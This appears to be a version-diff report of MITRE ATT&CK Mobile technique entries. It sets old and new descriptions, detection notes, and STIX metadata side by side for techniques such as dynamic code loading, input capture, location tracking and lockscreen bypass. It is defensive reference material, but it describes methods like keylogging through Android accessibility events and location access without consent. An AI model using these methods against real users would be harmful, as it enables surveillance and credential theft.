>alysis techniques) used for application vetting or applicati>cks and pre-publication scans in official app stores. In som
>on store review.(Citation: Poeplau-ExecuteThis)  On Android,>e cases, more advanced dynamic or behavioral analysis techni
> dynamic code could include native code, Dalvik code, or Jav>ques could detect this behavior. However, in conjunction wit
>aScript code that uses the Android WebView's JavascriptInter>h [Execution Guardrails](https://attack.mitre.org/techniques
>face capability.(Citation: Bromium-AndroidRCE)  On iOS, tech>/T1627) techniques, detecting malicious code downloaded afte
>niques also exist for executing dynamic code downloaded afte>r installation could be difficult.  On Android, dynamic code
>r application installation.(Citation: FireEye-JSPatch)(Citat> could include native code, Dalvik code, or JavaScript code 
>ion: Wang)>that utilizes Android WebView’s `JavascriptInterface` capabi
 >lity.   On iOS, dynamic code could be downloaded and execute
 >d through 3rd party libraries such as JSPatch. (Citation: Fi
 >reEye-JSPatch) 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesJing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.
external_referencesAPP-20
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1010
external_referencesAPP-20
external_referencesSebastian Poeplau, Yanick Fratantonio, Antonio Bianchi, Christopher Kruegel, Giovanni Vigna. (2014, February). Execute This! Analyzing Unsafe and Malicious Dynamic Code Loading in Android Applications. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-10-09 19:40:52.090000+00:002022-04-06 12:26:31.735000+00:00
descriptionAn app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review.(Citation: Poeplau-ExecuteThis) On Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView's JavascriptInterface capability.(Citation: Bromium-AndroidRCE) On iOS, techniques also exist for executing dynamic code downloaded after application installation.(Citation: FireEye-JSPatch)(Citation: Wang)Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult. On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s `JavascriptInterface` capability. On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueFireEye-JSPatch
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.htmlhttps://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html
external_references[2]['source_name']Poeplau-ExecuteThisNIST Mobile Threat Catalogue
external_references[2]['url']https://www.internetsociety.org/sites/default/files/10_5_0.pdfhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html
x_mitre_detectionDownloading new code at runtime can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversary behavior.Existing network infrastructure may detect network calls to known malicious domains or the transfer of malicious payloads over the network. Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Application vetting services could look for indications that the application downloads and executes new code at runtime (e.g., on Android, use of `DexClassLoader`, `System.load`, or the WebView `JavaScriptInterface` capability; on iOS, use of JSPatch or similar capabilities). Unfortunately, this is only a partial mitigation, as additional scrutiny would still need to be applied to applications that use these techniques. These techniques are often used without malicious intent, and applications may employ other techniques to hide their use of these techniques.
x_mitre_version1.21.3
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Bromium-AndroidRCE', 'description': 'Tom Sutcliffe. (2014, July 31). Remote code execution on Android devices. Retrieved December 9, 2016.', 'url': 'https://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/'}
external_references{'source_name': 'FireEye-JSPatch', 'description': 'Jing Xie, Zhaofeng Chen, Jimmy Su. (2016, January 27). HOT OR NOT? THE BENEFITS AND RISKS OF IOS REMOTE HOT PATCHING. Retrieved December 9, 2016.', 'url': 'https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html'}
external_references{'source_name': 'Wang', 'description': 'Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013, August). Jekyll on iOS: When Benign Apps Become Evil. Retrieved December 9, 2016.', 'url': 'https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei'}

[T1428] Exploitation of Remote Services

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may attempt to exploit enterprise servers, workst1Adversaries may exploit remote services of enterprise server
>tations, or other resources over the network. This technique>s, workstations, or other resources to gain unauthorized acc
> may take advantage of the mobile device's access to an inte>ess to internal systems once inside of a network. Adversarie
>rnal enterprise network either through local connectivity or>s may exploit remote services by taking advantage of a mobil
> through a Virtual Private Network (VPN).>e device’s access to an internal enterprise network through 
 >local connectivity or through a Virtual Private Network (VPN
 >). Exploitation of a software vulnerability occurs when an a
 >dversary takes advantage of a programming error in a program
 >, service, or within the operating system software or kernel
 > itself to execute adversary-controlled code. A common goal 
 >for post-compromise exploitation of remote services is for l
 >ateral movement to enable access to a remote system.   An ad
 >versary may need to determine if the remote system is in a v
 >ulnerable state, which may be done through [Network Service 
 >Scanning](https://attack.mitre.org/techniques/T1423) or othe
 >r Discovery methods. These look for common, vulnerable softw
 >are that may be deployed in the network, the lack of certain
 > patches that may indicate vulnerabilities, or security soft
 >ware that may be used to detect or contain remote exploitati
 >on. Servers are likely a high value target for lateral movem
 >ent exploitation, but endpoint systems may also be at risk i
 >f they provide an advantage or access to additional resource
 >s.  Depending on the permissions level of the vulnerable rem
 >ote service, an adversary may achieve [Exploitation for Priv
 >ilege Escalation](https://attack.mitre.org/techniques/T1404)
 > as a result of lateral movement exploitation as well. 

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionDetecting software exploitation initiated by a mobile device may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Network traffic analysis could reveal patterns of compromise if devices attempt to access unusual targets or resources. Application vetting may be able to identify applications that perform Discovery or utilize existing connectivity to remotely access hosts within an internal enterprise network.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1031
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 12:45:44.023000+00:00
nameExploit Enterprise ResourcesExploitation of Remote Services
descriptionAdversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device's access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. Depending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.01.1

[T1420] File and Directory Discovery

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1On Android, command line tools or the Java file APIs can be t1Adversaries may enumerate files and directories or search in
>used to enumerate file system contents. However, Linux file > specific device locations for desired information within a 
>permissions and SELinux policies generally strongly restrict>filesystem. Adversaries may use the information from [File a
> what can be accessed by apps (without taking advantage of a>nd Directory Discovery](https://attack.mitre.org/techniques/
> privilege escalation exploit). The contents of the external>T1420) during automated discovery to shape follow-on behavio
> storage directory are generally visible, which could presen>rs, including deciding if the adversary should fully infect 
>t concern if sensitive data is inappropriately stored there.>the target and/or attempt specific actions.   On Android, Li
>  iOS's security architecture generally restricts the abilit>nux file permissions and SELinux policies typically stringen
>y to perform file and directory discovery without use of esc>tly restrict what can be accessed by apps without taking adv
>alated privileges.>antage of a privilege escalation exploit. The contents of th
 >e external storage directory are generally visible, which co
 >uld present concerns if sensitive data is inappropriately st
 >ored there. iOS's security architecture generally restricts 
 >the ability to perform any type of [File and Directory Disco
 >very](https://attack.mitre.org/techniques/T1420) without use
 > of escalated privileges. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionOn Android, users are presented with a permissions popup when an application requests access to external device storage.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1023
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-19 19:52:12.345000+00:00
descriptionOn Android, command line tools or the Java file APIs can be used to enumerate file system contents. However, Linux file permissions and SELinux policies generally strongly restrict what can be accessed by apps (without taking advantage of a privilege escalation exploit). The contents of the external storage directory are generally visible, which could present concern if sensitive data is inappropriately stored there. iOS's security architecture generally restricts the ability to perform file and directory discovery without use of escalated privileges.Adversaries may enumerate files and directories or search in specific device locations for desired information within a filesystem. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) during automated discovery to shape follow-on behaviors, including deciding if the adversary should fully infect the target and/or attempt specific actions. On Android, Linux file permissions and SELinux policies typically stringently restrict what can be accessed by apps without taking advantage of a privilege escalation exploit. The contents of the external storage directory are generally visible, which could present concerns if sensitive data is inappropriately stored there. iOS's security architecture generally restricts the ability to perform any type of [File and Directory Discovery](https://attack.mitre.org/techniques/T1420) without use of escalated privileges.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html', 'external_id': 'STA-41'}
x_mitre_platformsiOS

[T1417] Input Capture

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1Adversaries may capture user input to obtain credentials or t1Adversaries may use methods of capturing user input to obtai
>other information from the user through various methods.  Ma>n credentials or collect information. During normal device u
>lware may masquerade as a legitimate third-party keyboard to>sage, users often provide credentials to various locations, 
> record user keystrokes.(Citation: Zeltser-Keyboard) On both>such as login pages/portals or system dialog boxes. Input ca
> Android and iOS, users must explicitly authorize the use of>pture mechanisms may be transparent to the user (e.g. [Keylo
> third-party keyboard apps. Users should be advised to use e>gging](https://attack.mitre.org/techniques/T1417/001)) or re
>xtreme caution before granting this authorization when it is>ly on deceiving the user into providing input into what they
> requested.  On Android, malware may abuse accessibility fea> believe to be a genuine application prompt (e.g. [GUI Input
>tures to record keystrokes by registering an `AccessibilityS> Capture](https://attack.mitre.org/techniques/T1417/002)).
>ervice` class, overriding the `onAccessibilityEvent` method, 
> and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CH 
>ANGED` event type. The event object passed into the function 
> will contain the data that the user typed.  Additional meth 
>ods of keylogging may be possible if root access is availabl 
>e. 

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAPP-31
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1020
external_referencesLenny Zeltser. (2016, July 30). Security of Third-Party Keyboard Apps on Mobile Devices. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 15:09:12.483000+00:002022-04-11 18:48:26.111000+00:00
descriptionAdversaries may capture user input to obtain credentials or other information from the user through various methods. Malware may masquerade as a legitimate third-party keyboard to record user keystrokes.(Citation: Zeltser-Keyboard) On both Android and iOS, users must explicitly authorize the use of third-party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested. On Android, malware may abuse accessibility features to record keystrokes by registering an `AccessibilityService` class, overriding the `onAccessibilityEvent` method, and listening for the `AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED` event type. The event object passed into the function will contain the data that the user typed. Additional methods of keylogging may be possible if root access is available.Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']Zeltser-KeyboardNIST Mobile Threat Catalogue
external_references[1]['url']https://zeltser.com/third-party-keyboards-security/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html
x_mitre_detectionOn Android, users can view and manage which applications have third-party keyboard access through the device settings in System -> Languages & input -> Virtual keyboard. On iOS, users can view and manage which applications have third-party keyboard access through the device settings in General -> Keyboard. On Android, users can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay. Users can view and manage installed third-party keyboards.
x_mitre_version2.12.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html', 'external_id': 'AUT-13'}

[T1430] Location Tracking

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1An adversary could use a malicious or exploited application t1Adversaries may track a device’s physical location through u
>to surreptitiously track the device's physical location thro>se of standard operating system APIs via malicious or exploi
>ugh use of standard operating system APIs.>ted applications on the compromised device.      On Android,
 > applications holding the `ACCESS_COAURSE_LOCATION` or `ACCE
 >SS_FINE_LOCATION` permissions provide access to the device’s
 > physical location. On Android 10 and up, declaration of the
 > `ACCESS_BACKGROUND_LOCATION` permission in an application’s
 > manifest will allow applications to request location access
 > even when the application is running in the background.(Cit
 >ation: Android Request Location Permissions) Some adversarie
 >s have utilized integration of Baidu map services to retriev
 >e geographical location once the location access permissions
 > had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: 
 >Palo Alto HenBox)      On iOS, applications must include the
 > `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAnd
 >WhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDes
 >cription` keys in their `Info.plist` file depending on the e
 >xtent of requested access to location information.(Citation:
 > Apple Requesting Authorization for Location Services) On iO
 >S 8.0 and up, applications call `requestWhenInUseAuthorizati
 >on()` to request access to location information when the app
 >lication is in use or `requestAlwaysAuthorization()` to requ
 >est access to location information regardless of whether the
 > application is in use. With elevated privileges, an adversa
 >ry may be able to access location data without explicit user
 > consent with the `com.apple.locationd.preauthorized` entitl
 >ement key.(Citation: Google Project Zero Insomnia)

New Mitigations:

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesA. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1033
external_referencesAPP-24
values_changed
STIX FieldOld valueNew Value
modified2019-10-15 20:01:06.186000+00:002022-04-01 17:05:16.493000+00:00
descriptionAn adversary could use a malicious or exploited application to surreptitiously track the device's physical location through use of standard operating system APIs.Adversaries may track a device’s physical location through use of standard operating system APIs via malicious or exploited applications on the compromised device. On Android, applications holding the `ACCESS_COAURSE_LOCATION` or `ACCESS_FINE_LOCATION` permissions provide access to the device’s physical location. On Android 10 and up, declaration of the `ACCESS_BACKGROUND_LOCATION` permission in an application’s manifest will allow applications to request location access even when the application is running in the background.(Citation: Android Request Location Permissions) Some adversaries have utilized integration of Baidu map services to retrieve geographical location once the location access permissions had been obtained.(Citation: PaloAlto-SpyDealer)(Citation: Palo Alto HenBox) On iOS, applications must include the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file depending on the extent of requested access to location information.(Citation: Apple Requesting Authorization for Location Services) On iOS 8.0 and up, applications call `requestWhenInUseAuthorization()` to request access to location information when the application is in use or `requestAlwaysAuthorization()` to request access to location information regardless of whether the application is in use. With elevated privileges, an adversary may be able to access location data without explicit user consent with the `com.apple.locationd.preauthorized` entitlement key.(Citation: Google Project Zero Insomnia)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CataloguePalo Alto HenBox
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.htmlhttps://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/
x_mitre_detectionOn both Android (6.0 and up) and iOS, the user can view which applications have permission to access device location through the device settings screen, and the user can choose to revoke the permissions.Android applications requesting the `ACCESS_COARSE_LOCATION`, `ACCESS_FINE_LOCATION`, or `ACCESS_BACKGROUND_LOCATION` permissions and iOS applications including the `NSLocationWhenInUseUsageDescription`, `NSLocationAlwaysAndWhenInUseUsageDescription`, and/or `NSLocationAlwaysUsageDescription` keys in their `Info.plist` file could be scrutinized during the application vetting process. In both Android (6.0 and up) and iOS, users can view which applications have the permission to access the device location through the device settings screen and revoke permissions as necessary.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Android Request Location Permissions', 'description': 'Android Developers. (2022, March 24). Request Location Permissions. Retrieved April 1, 2022.', 'url': 'https://developer.android.com/training/location/permissions'}
external_references{'source_name': 'Apple Requesting Authorization for Location Services', 'description': 'Apple Developers. (n.d.). Requesting Authorization for Location Services. Retrieved April 1, 2022.', 'url': 'https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services'}
external_references{'source_name': 'Google Project Zero Insomnia', 'description': 'I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020.', 'url': 'https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html'}
external_references{'source_name': 'PaloAlto-SpyDealer', 'description': 'Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.', 'url': 'https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/'}
external_references{'source_name': 'NIST Mobile Threat Catalogue', 'url': 'https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-24.html', 'external_id': 'APP-24'}

[T1461] Lockscreen Bypass

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary with physical access to a mobile device may seet1An adversary with physical access to a mobile device may see
>k to bypass the device's lockscreen.  ### Biometric Spoofing>k to bypass the device’s lockscreen. Several methods exist t
> If biometric authentication is used, an adversary could att>o accomplish this, including:  * Biometric spoofing: If biom
>empt to spoof a mobile device's biometric authentication mec>etric authentication is used, an adversary could attempt to 
>hanism(Citation: SRLabs-Fingerprint)(Citation: SecureIDNews->spoof a mobile device’s biometric authentication mechanism. 
>Spoof)(Citation: TheSun-FaceID).  iOS partly mitigates this >Both iOS and Android partly mitigate this attack by requirin
>attack by requiring the device passcode rather than a finger>g the device’s passcode rather than biometrics to unlock the
>print to unlock the device after every device restart and af> device after every device restart, and after a set or rando
>ter 48 hours since the device was last unlocked (Citation: A>m amount of time.(Citation: SRLabs-Fingerprint)(Citation: Th
>pple-TouchID). Android has similar mitigations.  ### Device >eSun-FaceID) * Unlock code bypass: An adversaries could atte
>Unlock Code Guessing or Brute Force An adversary could attem>mpt to brute-force or otherwise guess the lockscreen passcod
>pt to brute-force or otherwise guess the lockscreen passcode>e (typically a PIN or password), including physically observ
> (typically a PIN or password), including physically observi>ing (“shoulder surfing”) the device owner’s use of the locks
>ng ("shoulder surfing") the device owner's use of the locksc>creen passcode. Mobile OS vendors partly mitigate this by im
>reen passcode.   ### Exploit Other Device Lockscreen Vulnera>plementing incremental backoff timers after a set number of 
>bilities Techniques have periodically been demonstrated that>failed unlock attempts, as well as a configurable full devic
> exploit vulnerabilities on Android (Citation: Wired-Android>e wipe after several failed unlock attempts. * Vulnerability
>Bypass), iOS (Citation: Kaspersky-iOSBypass), or other mobil> exploit: Techniques have been periodically demonstrated tha
>e devices to bypass the device lockscreen. The vulnerabiliti>t exploit mobile devices to bypass the lockscreen. The vulne
>es are generally patched by the device/operating system vend>rabilities are generally patched by the device or OS vendor 
>or once they become aware of their existence.>once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kas
 >persky-iOSBypass) 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionUsers can see if someone is watching them type in their device passcode.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1064
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 17:08:07.111000+00:002022-04-19 15:36:12.312000+00:00
descriptionAn adversary with physical access to a mobile device may seek to bypass the device's lockscreen. ### Biometric Spoofing If biometric authentication is used, an adversary could attempt to spoof a mobile device's biometric authentication mechanism(Citation: SRLabs-Fingerprint)(Citation: SecureIDNews-Spoof)(Citation: TheSun-FaceID). iOS partly mitigates this attack by requiring the device passcode rather than a fingerprint to unlock the device after every device restart and after 48 hours since the device was last unlocked (Citation: Apple-TouchID). Android has similar mitigations. ### Device Unlock Code Guessing or Brute Force An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing ("shoulder surfing") the device owner's use of the lockscreen passcode. ### Exploit Other Device Lockscreen Vulnerabilities Techniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including: * Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism. Both iOS and Android partly mitigate this attack by requiring the device’s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID) * Unlock code bypass: An adversaries could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts. * Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']SRLabs-FingerprintWired-AndroidBypass
external_references[1]['description']SRLabs. (n.d.). Fingerprints are not fit for secure device unlocking. Retrieved December 23, 2016.Andy Greenberg. (2015, September 15). Hack Brief: Emergency Number Hack Bypasses Android Lock Screens. Retrieved December 23, 2016.
external_references[1]['url']https://srlabs.de/bites/spoofing-fingerprints/https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/
external_references[2]['source_name']SecureIDNews-SpoofKaspersky-iOSBypass
external_references[2]['description']Zack Martin. (2016, March 11). Another spoof of mobile biometrics. Retrieved September 18, 2018.Chris Brook. (2016, November 17). iOS 10 Passcode Bypass Can Access Photos, Contacts. Retrieved December 23, 2016.
external_references[2]['url']https://thehackernews.com/2016/05/android-kernal-exploit.htmlhttps://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/
external_references[4]['source_name']Apple-TouchIDSRLabs-Fingerprint
external_references[4]['description']Apple. (2015, November 3). About Touch ID security on iPhone and iPad. Retrieved December 23, 2016.SRLabs. (n.d.). Fingerprints are not fit for secure device unlocking. Retrieved December 23, 2016.
external_references[4]['url']https://support.apple.com/en-us/HT204587https://srlabs.de/bites/spoofing-fingerprints/
x_mitre_version1.11.2
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Wired-AndroidBypass', 'description': 'Andy Greenberg. (2015, September 15). Hack Brief: Emergency Number Hack Bypasses Android Lock Screens. Retrieved December 23, 2016.', 'url': 'https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/'}
external_references{'source_name': 'Kaspersky-iOSBypass', 'description': 'Chris Brook. (2016, November 17). iOS 10 Passcode Bypass Can Access Photos, Contacts. Retrieved December 23, 2016.', 'url': 'https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/'}

[T1464] Network Denial of Service

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An attacker could jam radio signals (e.g. Wi-Fi, cellular, Gt1Adversaries may perform Network Denial of Service (DoS) atta
>PS) to prevent the mobile device from communicating. (Citati>cks to degrade or block the availability of targeted resourc
>on: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTi>es to users. Network DoS can be performed by exhausting the 
>mes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arst>network bandwidth that services rely on, or by jamming the s
>echnica-Celljam)>ignal going to or coming from devices.   A Network DoS will 
 >occur when an adversary is able to jam radio signals (e.g. W
 >i-Fi, cellular, GPS) around a device to prevent it from comm
 >unicating. For example, to jam cellular signal, an adversary
 > may use a handheld signal jammer, which jam devices within 
 >the jammer’s operational range.(Citation: NIST-SP800187)   U
 >sage of cellular jamming has been documented in several arre
 >sts reported in the news.(Citation: CNET-Celljammer)(Citatio
 >n: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citatio
 >n: Arstechnica-Celljam)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionUnexpected loss of radio signal could indicate that a device is being actively jammed.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesChris Matyszczyk. (2014, May 1). FCC: Man used device to jam drivers' cell phone calls. Retrieved November 8, 2018.
external_referencesDavid Kravets. (2016, March 10). Man accused of jamming passengers’ cell phones on Chicago subway. Retrieved November 8, 2018.
external_referencesJeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.
external_referencesMatt Richtel. (2007, November 4). Devices Enforce Silence of Cellphones, Illegally. Retrieved November 8, 2018.
external_referencesCEL-7
external_referencesCEL-8
external_referencesLPN-5
external_referencesGPS-0
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1067
external_referencesCEL-7
external_referencesCEL-8
external_referencesLPN-5
external_referencesGPS-0
external_referencesChris Matyszczyk. (2014, May 1). FCC: Man used device to jam drivers' cell phone calls. Retrieved November 8, 2018.
external_referencesMatt Richtel. (2007, November 4). Devices Enforce Silence of Cellphones, Illegally. Retrieved November 8, 2018.
external_referencesTrevor Mogg. (2015, June 5). Florida teacher punished after signal-jamming his students’ cell phones. Retrieved November 8, 2018.
external_referencesDavid Kravets. (2016, March 10). Man accused of jamming passengers’ cell phones on Chicago subway. Retrieved November 8, 2018.
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 14:15:21.946000+00:002022-04-06 13:26:42.303000+00:00
nameJamming or Denial of ServiceNetwork Denial of Service
